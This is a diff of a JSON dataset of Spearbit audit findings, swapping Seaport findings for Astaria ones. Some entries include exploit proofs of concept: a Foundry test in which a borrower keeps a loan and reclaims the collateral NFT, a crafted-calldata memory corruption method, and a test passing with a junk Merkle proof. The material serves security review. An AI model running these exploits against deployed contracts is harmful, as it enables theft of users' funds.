But these risks are transferred to the upcoming shareholders, or the shareholders who have not redeemed their positions yet.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Advance orders of CONTRACT order types can generate orders with less consideration items that would break the aggregation routine", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide fewer consideration items for this order, so the total number of consideration items might be less than the ones provided by the caller. But since the caller would need to provide the fulfillment data to Seaport beforehand, they might use indices that would turn out to be out of range for the consideration in question after the modification applied for the contract offerer above. If this happens, the whole call will be reverted. This issue is in the same category as 'Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine'.", + "title": "validateOrder(...) does not check the consideration amount against its token balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a lien position gets liquidated, the CollateralToken creates a full restricted Seaport auction with itself as both the offerer and the zone. This will cause Seaport to do a callback to the CollateralToken's validateOrder(...) endpoint at the end of order fulfilment/matching. In this endpoint we have: uint256 payment = zoneParameters.consideration[0].amount; This payment amount is not validated.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "For most advanced order types, we have the following check: // Read numerator and denominator from memory and place on the stack. uint256 numerator = uint256(advancedOrder.numerator); uint256 denominator = uint256(advancedOrder.denominator); // Ensure that the supplied numerator and denominator are valid. if (numerator > denominator || numerator == 0) { _revertBadFraction(); } For CONTRACT order types this check is skipped. For later calculations (calculating the current amount) Seaport uses the numerator and denominator returned by _getGeneratedOrder, which as a pair is either (1, 1) or (0, 0). advancedOrder.numerator is only used to skip certain operations in some loops when it is 0: skip applying criteria resolvers; skip aggregating the amount for executions; skip the final validity check. Skipping the above operations would make sense. But when, for an advancedOrder with CONTRACT order type, _getGeneratedOrder returns (h, 1, 1) and advancedOrder.numerator == 0, we would skip applying criteria resolvers, aggregating the amounts from offer or consideration amounts for this order, and skip the final validity check that would call into the ratifyOrder endpoint of the offerer.
But emitting the following OrderFulfilled will not be skipped, even though this advancedOrder will not be used: // Emit an OrderFulfilled event. _emitOrderFulfilledEvent( orderHash, orderParameters.offerer, orderParameters.zone, recipient, orderParameters.offer, orderParameters.consideration ); This can create discrepancies between what happens on chain and what off-chain agents index/record.", + "title": "If the auction window is 0, the borrower can keep the lien amount and also take back its collateralised NFT token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "If an authorised entity would file to set the auctionWindow to 0, borrowers can keep their lien amount and also take back their collateralised NFT tokens. Below is how this type of vulnerability works: 1. A borrower takes a lien from a vault by collateralising its NFT token. 2. The borrower lets the time pass so that its lien/stack position can be liquidated. 3. The borrower atomically liquidates and then calls the liquidatorNFTClaim(...) endpoint of the CollateralToken. The timestamps are as follows: t_lien_s <= t_lien_e = t_auction_s = t_auction_e We should note that in step 3 above, when the borrower liquidates its own position, the CollateralToken creates a Seaport auction by calling its validate(...) endpoint. But this endpoint does not validate the order's timestamps, so the auction is registered even though the timestamps provided are not valid. When one tries to fulfil/match the order, Seaport requires that t_auction_s <= t_now < t_auction_e, so it is not possible to fulfil/match an order where t_auction_s = t_auction_e. Thus, in step 3 it is not needed to call liquidatorNFTClaim(...) immediately, as the auction created cannot be fulfilled by anyone.
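A minimal guard sketch for the file route, given only as a hypothetical shape (the PoC below sets the window to 0 through fileBatch; the error name is assumed): if (what == IAstariaRouter.FileType.AuctionWindow) { uint256 window = abi.decode(data, (uint256)); // a zero-length auction has startTime == endTime and can never be fulfilled if (window == 0) revert InvalidFileData(); s.auctionWindow = window; }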
// add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol function _createUser(uint256 pk, string memory label) internal returns (address addr) { uint256 ownerPK = uint256(pk); addr = vm.addr(ownerPK); vm.label(addr, label); } function testScenario14() public { // allow flash liens - liens that can be liquidated in the same block they were committed IAstariaRouter.File[] memory files = new IAstariaRouter.File[](1); files[0] = IAstariaRouter.File( IAstariaRouter.FileType.AuctionWindow, abi.encode(uint256(0)) ); ASTARIA_ROUTER.fileBatch(files); console2.log(\"[+] set auction window to 0.\"); { } { address borrower1 = _createUser(0xb055033501, \"borrower1\"); address vaultOwner = _createUser(0xa77ac3, \"vaultOwner\"); address publicVault = _createPublicVault(vaultOwner, vaultOwner, 14 days); vm.label(publicVault, \"publicVault\"); console2.log(\"[+] public vault is created: %s\", publicVault); console2.log(\"vault start: %s\", IPublicVault(publicVault).START()); skip(14 days); _lendToVault( Lender({addr: vaultOwner, amountToLend: 10 ether}), payable(publicVault) ); TestNFT nft1 = new TestNFT(1); address tokenContract1 = address(nft1); uint256 tokenId1 = uint256(0); nft1.transferFrom(address(this), borrower1, tokenId1); vm.startPrank(borrower1); (uint256 lienId, ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: vaultOwner, strategistPK: 0xa77ac3, tokenContract: tokenContract1, tokenId: tokenId1, lienDetails: ILienToken.Details({ maxAmount: 2 ether, rate: 1e8, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 10 ether }), amount: 2 ether, revertMessage: \"\" }); console2.log(\"ETH balance of the borrower: %s\", borrower1.balance); skip(1 hours); console2.log(\"[+] lien created with 0 duration. lienId: %s\", lienId); OrderParameters memory params = _liquidate(stack); console2.log(\"[+] lien liquidated by the borrower.\"); COLLATERAL_TOKEN.liquidatorNFTClaim( stack, params, COLLATERAL_TOKEN.SEAPORT().getCounter(address(COLLATERAL_TOKEN)) ); console2.log(\"[+] liquidator/borrower claimed NFT.\\n\"); vm.stopPrank(); console2.log(\"owner of the NFT token: %s\", nft1.ownerOf(tokenId1)); console2.log(\"ETH balance of the borrower: %s\", borrower1.balance); assertEq( nft1.ownerOf(tokenId1), borrower1, \"the borrower should own the NFT\" ); assertEq( borrower1.balance, 2 ether, \"borrower should still have the lien amount.\" ); } } forge t --mt testScenario14 --ffi -vvv: [+] set auction window to 0. [+] public vault is created: 0x4430c0731d87768Bf65c60340D800bb4B039e2C4 vault start: 1 ETH balance of the borrower: 2000000000000000000 [+] lien created with 0 duration. lienId: 91310819262208864484407122336131134788367087956387872647527849353935417268035 [+] lien liquidated by the borrower. [+] liquidator/borrower claimed NFT. owner of the NFT token: 0xA92D072d39E6e0a584a6070a6dE8D88dfDBae2C7 ETH balance of the borrower: 2000000000000000000", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Calls to PausableZone's executeMatchAdvancedOrders and executeMatchOrders would revert if unused native tokens would need to be returned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In match (advanced) orders, one can provide native tokens as offer and consideration items. So a PausableZone would need to provide msg.value to call the corresponding Seaport endpoints.
There are a few scenarios where not all of the msg.value native token amount provided to the Seaport marketplace will be used: 1. Rounding errors in calculating the current amount of offer or consideration items. The zone can prevent sending extra native tokens to Seaport by pre-calculating these values and making sure its transaction is included in the specific block that these values were calculated for (this is important when the start and end amounts of an item are not equal). 2. The zone (un)intentionally sends more native tokens than necessary to Seaport. 3. The (advanced) orders sent for matching in Seaport include an order of the CONTRACT offerer order type, and the offerer contract provides a different amount for at least one item, which would eventually make the whole transaction not use the full msg.value provided to it. In all these cases, since PausableZone does not have a receive or fallback endpoint to accept native tokens, when Seaport tries to send back the unused native token amount the transaction may revert. PausableZone not accepting native tokens: $ export CODE=$(jq -r '.deployedBytecode' artifacts/contracts/zones/PausableZone.sol/PausableZone.json | tr -d '\\n') $ evm --code $CODE --value 1 --prestate genesis.json --sender 0xb4d0000000000000000000000000000000000000 --nomemory=false --debug run $ evm --input $(echo $CODE | head -c 44 - | sed -E s/0x//) disasm 6080806040526004908136101561001557600080fd 00000: PUSH1 0x80 00002: DUP1 00003: PUSH1 0x40 00005: MSTORE 00006: PUSH1 0x04 00008: SWAP1 00009: DUP2 0000a: CALLDATASIZE 0000b: LT 0000c: ISZERO 0000d: PUSH2 0x0015 00010: JUMPI 00011: PUSH1 0x00 00013: DUP1 00014: REVERT The trace of evm ... --debug run gives: error: execution reverted #### TRACE ####
|................| 00 00 00 00 00 00 00 80 |................| pc=00000010 gas=4699970 cost=2 0x4 0x80 0x4 CALLDATASIZE Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| 13 LT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 ISZERO Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH2 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 JUMPI Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 pc=00000011 gas=4699968 cost=3 0x0 0x4 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000012 gas=4699965 cost=3 0x1 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000013 gas=4699962 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000016 gas=4699959 cost=10 0x15 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000017 gas=4699949 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 14 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| DUP1 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 REVERT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 
00000020 00000030 00000040 00000050 pc=00000019 gas=4699946 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000020 gas=4699943 cost=0 0x0 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| #### LOGS #### genesis.json: { \"gasLimit\": \"4700000\", \"difficulty\": \"1\", \"alloc\": { \"0xb4d0000000000000000000000000000000000000\": { \"balance\": \"10000000000000000000000000\", \"code\": \"\", \"storage\": {} } } } // file: test/zone.spec.ts ... it(\"Fulfills an order with executeMatchAdvancedOrders with NATIVE Consideration Item\", async () => { const pausableZoneControllerFactory = await ethers.getContractFactory( \"PausableZoneController\", owner ); const pausableZoneController = await pausableZoneControllerFactory.deploy( owner.address ); // Deploy pausable zone const zoneAddr = await createZone(pausableZoneController); 15 // Mint NFTs for use in orders const nftId = await mintAndApprove721(seller, marketplaceContract.address); // Define orders const offerOne = [ getTestItem721(nftId, toBN(1), toBN(1), undefined, testERC721.address), ]; const considerationOne = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), seller.address ), ]; const { order: orderOne, orderHash: orderHashOne } = await createOrder( seller, zoneAddr, offerOne, considerationOne, 2 ); const offerTwo = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), undefined ), ]; const considerationTwo = [ getTestItem721( nftId, toBN(1), toBN(1), buyer.address, testERC721.address ), ]; const { order: orderTwo, orderHash: orderHashTwo } = await createOrder( buyer, zoneAddr, offerTwo, considerationTwo, 2 ); const fulfillments = [ [[[0, 0]], [[1, 0]]], [[[1, 0]], [[0, 0]]], ].map(([offerArr, considerationArr]) => toFulfillment(offerArr, considerationArr) ); // Perform the match advanced orders with zone const tx = await pausableZoneController .connect(owner) 16 .executeMatchAdvancedOrders( zoneAddr, marketplaceContract.address, [orderOne, orderTwo], [], fulfillments, { value: parseEther(\"0.01\").add(1) } // the extra 1 wei reverts the tx ); // Decode all events and get the order hashes const orderFulfilledEvents = await decodeEvents(tx, [ { eventName: \"OrderFulfilled\", contract: marketplaceContract }, ]); expect(orderFulfilledEvents.length).to.equal(fulfillments.length); // Check that the actual order hashes match those from the events, in order const actualOrderHashes = [orderHashOne, orderHashTwo]; orderFulfilledEvents.forEach((orderFulfilledEvent, i) => expect(orderFulfilledEvent.data.orderHash).to.be.equal( actualOrderHashes[i] ) ); }); ... 
This bug also applies to Seaport 1.1 and PausableZone (0x004C00500000aD104D7DBd00e3ae0A5C00560C00)", + "title": "An owner might not be able to cancel all signed liens by calling incrementNonce()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "If the vault owner or the delegate is phished into signing terms with consecutive nonces in a big range, they would not be able to cancel all of those terms with the current incrementNonce() implementation, as it only increments the nonce by one at a time. As an example, Seaport increments its counters using the following formula: n += blockhash(block.number - 1) << 0x80;", "labels": [ "Spearbit", - "Seaport", - "Severity: Medium Risk" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "ABI decoding for bytes: memory can be corrupted by maliciously constructing the calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the code snippet below, size can be made 0 by maliciously crafting the calldata. In this case, the free memory pointer is not incremented. assembly { mPtrLength := mload(0x40) let size := and( add( and(calldataload(cdPtrLength), OffsetOrLengthMask), AlmostTwoWords ), OnlyFullWordMask ) calldatacopy(mPtrLength, cdPtrLength, size) mstore(0x40, add(mPtrLength, size)) } This has two different consequences: 1. If the memory offset mPtrLength is immediately used, then junk values at that memory location can be interpreted as the decoded bytes type. In the case of Seaport 1.2, the likelihood of the current free memory pointing to a junk value is low. So, this case has low severity. 2. The subsequent memory allocation will also use the value mPtrLength to store data in memory. This can lead to corrupting the initial memory data. In the worst case, the next allocation can be tuned so that the first bytes data can be any arbitrary data. To make the size calculation return 0: 1. Find a function call which has bytes as a (nested) parameter. 2. Modify the calldata field where the length of the above bytes is stored to the new length 0xffffe0. 3. The calculation will now return size = 0. Note: there is an additional requirement that this bytes type should be inside a dynamic struct. Otherwise, for example, in the case of function foo(bytes calldata signature), the compiler will insert a check that calldatasize is big enough to fit signature.length. Since the value 0xffffe0 is too big to fit into calldata, such an attack is impractical. However, for a bytes type inside a dynamic type, for example in function foo(bytes[] calldata signature), this check is skipped by solc (likely because it's expensive). For a practical exploit we need to look for such a function. In the case of Seaport 1.2 this could be the matchAdvancedOrders(AdvancedOrder[] calldata orders, ...) function. The struct AdvancedOrder has a nested parameter bytes signature as well as bytes extraData. In the above exploit one would be able to maliciously modify the calldata in such a way that Seaport would interpret the data in extraData as the signature. Here is a proof of concept for a simplified case that showcases injecting an arbitrary value into a decoded bytes.
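For illustration, a minimal sketch of the size calculation (not the audited code; OffsetOrLengthMask = 0xffffffff and OnlyFullWordMask = 0xffffe0 are quoted elsewhere in this report, while AlmostTwoWords = 0x3f is assumed here, i.e. one below two full words):

pragma solidity ^0.8.17;

contract SizeCalcDemo {
    uint256 constant OffsetOrLengthMask = 0xffffffff;
    uint256 constant AlmostTwoWords = 0x3f; // assumed value
    uint256 constant OnlyFullWordMask = 0xffffe0;

    // Mirrors the masked-length computation from the snippet above.
    function size(uint256 length) public pure returns (uint256) {
        unchecked {
            return
                ((length & OffsetOrLengthMask) + AlmostTwoWords) &
                OnlyFullWordMask;
        }
    }
    // size(0xffffe0) == 0: 0xffffe0 + 0x3f = 0x100001f, and the carry
    // (bit 24) falls outside the 24-bit OnlyFullWordMask, so the AND
    // clears every remaining bit.
}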
As for severity, even though interpreting calldata differently may not fundamentally break the protocol, an attacker with enough effort may be able to use this for subtle phishing attacks or as a precursor to other attacks.", + "title": "Error handling for USDT transactions in TransferProxy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "To handle edge cases where the receiver is blacklisted, TransferProxy.tokenTransferFromWithErrorReceiver(...) is designed to catch errors that may occur during the first transfer attempt and then proceed to send the tokens to the error receiver. try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } However, it's worth noting that this approach may not be compatible with non-standard ERC20 tokens (e.g., USDT) that do not return any value from a transferFrom operation. The try/catch pattern in Solidity can only catch errors resulting from reverted external contract calls; it does not handle failures caused by return values that cannot be decoded as expected. Consequently, when using USDT, the entire transaction will revert.", "labels": [ "Spearbit", - "Seaport", - "Severity: Medium Risk" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport receives a collection of advanced orders to match or fulfill, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide new consideration item recipients for this order. These new recipients are going to be used for this order from this point on. In _getGeneratedOrder, there is no comparison between old and new consideration recipients. The provided new recipients can create an issue when aggregating consideration items. Since the fulfillment data is provided beforehand by the caller of the Seaport endpoint, the caller might have provided fulfillment aggregation data that would have aggregated/combined one of the consideration items of this changed advance order with another consideration item. But the aggregation had taken into consideration the original recipient of the order in question. Multiple consideration items can only be aggregated if they share the same itemType, token, identifier, and recipient (ref). The new recipients provided by the contract offerer can break this invariant and in turn cause a revert.", + "title": "PublicVault does not handle funds in errorReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The payment process in LienToken.makePayment(...) transfers the tokens from the user to the vault using the function tokenTransferFromWithErrorReceiver from the TRANSFER_PROXY. The implementation in the TransferProxy contract involves sending the tokens to an error receiver that is controlled by the original receiver. However, this approach can lead to accounting errors in the PublicVault, as PublicVault does not pull tokens from the error receiver. function tokenTransferFromWithErrorReceiver( // ...
) { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } Note that, in practice, tokens would not be transferred to the error receiver. The issue is hence considered low risk.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "CriteriaResolvers.criteriaProof is not validated in the identifierOrCriteria == 0 case", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the case of identifierOrCriteria == 0, the criteria resolver completely skips any validations on the Merkle proof and in particular is missing the validation that CriteriaResolvers.criteriaProof.length == 0. Note: This is also present in Seaport 1.1 and may be a known issue. Proof of concept: modified test/advanced.spec.ts
@@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
   // Seller approves marketplace contract to transfer NFTs
   await set1155ApprovalForAll(seller, marketplaceContract.address, true);
-  const { root, proofs } = merkleTree([nftId]);
-  const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))];
+  const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))];
   const consideration = [
     getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address),
@@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
     getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address),
   ];
+  // Add a junk criteria proof and the test still passes
   const criteriaResolvers = [
-    buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]),
+    buildResolver(0, 0, 0, nftId, [\"0xdead000000000000000000000000000000000000000000000000000000000000\"]),
   ];
   const { order, orderHash, value } = await createOrder(", + "title": "Inconsistent Vault Fee Charging during Loan Liquidation via WithdrawProxy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In the smart contract code of PublicVault, there is an inconsistency related to the charging of fees when a loan is liquidated at the epoch's roll and the lien is sent to WithdrawProxy. The PublicVault.owner is supposed to take a ratio of the interest paid as the strategist's reward, and the fee should be charged when a payment is made in the function PublicVault.updateVault(...), regardless of whether it's a normal payment or a liquidation payment. It appears that the fee is not being charged when a loan is liquidated at the epoch's roll and the lien is sent to WithdrawProxy. This discrepancy could potentially lead to an inconsistent distribution of fees and rewards.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Calls to TypehashDirectory will be successful", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "TypehashDirectory's deployed bytecode starts with 00 which corresponds to the STOP opcode (SSTORE2 also uses this pattern). This choice for the first byte causes accidental calls to the contract to succeed silently.", + "title": "VaultImplementation.init(...)
silently initialised when the allowlist parameters are not thoroughly validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In VaultImplementation.init(...), if params.allowListEnabled is false but params.allowList is not empty, s.allowList does not get populated.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "_isValidBulkOrderSize does not perform the signature length validation correctly.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In _isValidBulkOrderSize the signature's length validation is performed as follows: let length := mload(signature) validLength := and( lt(length, BulkOrderProof_excessSize), lt(and(sub(length, BulkOrderProof_minSize), AlmostOneWord), 2) ) The sub opcode in the above snippet wraps around. If this was the correct formula then it would actually simplify to: lt(and(sub(length, 3), AlmostOneWord), 2) The simplified and the current version would allow length to also be 3, 4, 35, 36, 67, 68, but _isValidBulkOrderSize actually needs to check that the length l has the following form: l = 67 + x + 32·y, where x ∈ {0, 1} and y ∈ {1, 2, ..., 24} (y represents the height/depth of the bulk order).", + "title": "Several functions in AstariaRouter can be made non-payable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following functions in AstariaRouter are payable when they should never be sent the native token: mint(), deposit(), withdraw(), redeem(), pullToken()", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "When contractNonce occupies more than 12 bytes the truncated nonce shared back with the contract offerer through ratifyOrder would be smaller than the actual stored nonce", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When contractNonce occupies more than 12 bytes the truncated nonce shared back with the contract offerer through ratifyOrder would be smaller than the actual stored nonce: // Write contractNonce to calldata dstHead.offset(ratifyOrder_contractNonce_offset).write( uint96(uint256(orderHash)) ); This is due to the way the contractNonce and the offerer's address are mixed in the orderHash: assembly { orderHash := or(contractNonce, shl(0x60, offerer)) }", + "title": "Loan duration can be reduced at the time of borrowing without user permission", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Requested loan duration, if greater than the maximum allowed duration (the time to the next epoch's end), is set to this maximum value: if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } This happens without explicit user permission.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "abi_decode_bytes does not mask the copied data length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When abi_decode_bytes decodes bytes, it does not mask the copied length of the data in memory (in other places the length is masked by OffsetOrLengthMask).", + "title": "Native tokens sent to DepositHelper can get locked", + "html_url":
"https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "DepositHelper has the following two endpoints: fallback() external payable {} receive() external payable {} If one calls this contract by not supplying the deposit(...) function signature, the msg.value provided would get locked in this contract.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "OrderHash in the context of contract orders need not refer to a unique order", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In Seaport 1.1 and in Seaport 1.2 for non-contract orders, order hashes have a unique correspon- dence with the order, i.e., it can be used to identify the status of an order on-chain and track it. However, in case of contract orders, this is not the case. It is simply the current nonce of the offerer, combined with the address. This cannot be used to uniquely track an order on-chain. uint256 contractNonce; unchecked { contractNonce = _contractNonces[offerer]++; } assembly { orderHash := or(contractNonce, shl(0x60, offerer)) } Here are some example scenarios where this can be problematic: Scenario 1: A reverted contract order and the adjacent succeeding contract order will have the same order hash, regardless of whether they correspond to the same order. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Assume that this transaction failed because enough gas was not provided for the generateOrder call. This tx would revert with a custom error InvalidContrac- tOrder, generated from OrderValidator.sol#L391. 22 2. Consider Bob calling fulfilledAdvancedOrder for a different contract order with offerer = X, same smart contract offerer. OrderFulfiller.sol#L124 This order will succeed and emit the OrderFulfilled event the from In the above scenario, there are two different orders, one that reverted on-chain and the other that succeeded, both having the same orderHash despite the orders only sharing the same contract offerer--the other parameters can be completely arbitrary. Scenario 2: Contract order hashes computed off-chain can be misleading. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Alice computed the orderHash of their order off-chain by simulating the transaction, sends the transaction and polls the OrderFulfilled event with the same orderHash to know if the order has been fulfilled. 2. Consider Bob calling fulfilledAdvancedOrder for any contract order with offerer = X, the same smart contract offerer. 3. Bob's transaction gets included first. An OrderFulfilled event is emitted, with the orderHash to be the same hash that Alice computed off-chain! Alice may believe that their order succeeded. for non-contract Orders, the above approach would be valid, i.e., one may generate and sign an order, Note: compute the order hash of an order off-chain and poll for an OrderFulfilled with the order hash to know that it was fulfilled. Note: even though there is an easier way to track if the order succeeded in these cases, in the general case, Alice or Bob need not be the one executing the orders on-chain. 
